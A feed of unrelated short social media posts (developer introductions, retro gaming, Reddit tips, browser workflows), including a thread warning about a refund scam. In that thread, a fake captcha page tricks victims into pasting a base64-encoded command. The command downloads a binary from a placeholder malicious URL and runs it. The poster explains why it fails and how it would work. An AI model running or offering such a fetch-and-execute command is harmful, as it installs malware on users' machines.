Hi new folks! 👋 I'm mostly about web dev, video dev, design, online biz, content creation Used to do a lot of React! Lately Svelte, Rust, Tauri I make a video editor to remove pauses / speed up editing getrecut.com Hobbies: music, 3D printing, flying (am pilot), woodworking, DIY, more to come!

So this is the part where OpenAI harvests everyone's government ID right? "Because now that it has adult features they'll need IDs from everyone to ensure safety"?

i’m back from a vacation and i have good availability for next month for consulting! i may be able to help with: getting unstuck at work (if you’re stuck with a software dev problem), frontend architecture, anything react-related the format is an hourly call dan.abramov.consulting@gmail.com

This is so awesome! It's like being a kid again but with better graphics. It's harder than I remember!

The public alpha of the XWVM project is really great. The gameplay is really smooth and the HD graphics are really amazing. Check moddb.com/mods/xwvm #xwing #starwars #lucasarts #pcgaming #spacesim #retrogaming #retrogames #retrogamer #dosgaming #dosgames #msdos

I think I have finally managed to articulate this very fundamental but slightly counterintuitive fact about how shell redirection works

Is there like... a place you can submit binaries that are probably malware?

The symbols are stripped. There's not much in the way of useful strings, other than some file extensions. I don't see much, but tbh I'm not much of a reverse engineer. I can only guess it's some sort of ransomware, best not to run. Anyway if you get a random refund request tell em to go to hell.

A sneaky scam I've seen a few times now: Someone writes into support to demand a refund for a duplicate charge. "oh crap!" But their email is nowhere in my system, nor is their name...

It's a 362kb binary A "fat" binary, with both x86_64 and arm64 binaries inside So it'll run on both Intel and Apple Silicon Macs I opened it in Ghidra to disassemble it.

The shell snippet is: echo -n <long base64 string> | base64 -d | bash Which expands to: curl -s -o /tmp/foo <malicious-url>; chmod +x /tmp/foo; /tmp/foo The funny thing is, it can't actually work

The malicious URL returns a 301 redirect. But curl doesn't follow redirects by default! It needs the -L flag for that, which they didn't include. With -L though, I was able to download the binary.

The sketchy link, a Google Sites page, shows a fake captcha checkbox. And it copies a terminal command into your clipboard. And then: "to better prove you're not a robot, open a terminal and hit paste, enter"

Way back when People used CDs They were only 650mb They measured size in minutes They weren’t rewritable yet (or maybe I couldn’t afford those drives) CompUSA was still a company

1. lurk first to get the feeling for each subreddit - they all have different cultures 2. contribute useful posts/karma 3. link in bio 4. only after you've built up a decent amount of karma, start slowly dropping mentions of your work / product but not in a sales way, use it to teach/explain

Guys, I’m planning to head over to Reddit soon 🫡 What are your best tips to not get ignored (or slaughtered) over there?

My productivity goes to die in a busy browser window. However, I've developed some keyboard-centric workflows using Vimium that have completely changed how I get things done in the browser. So excited to share those workflows in my *first* ever @egghead.io course. egghead.io/courses/get-...

i miss the early internet. people were like “you gotta see this dude. this cat sure is long.” and they were right. it was really long. it never shoulda gotten any more complicated than that.
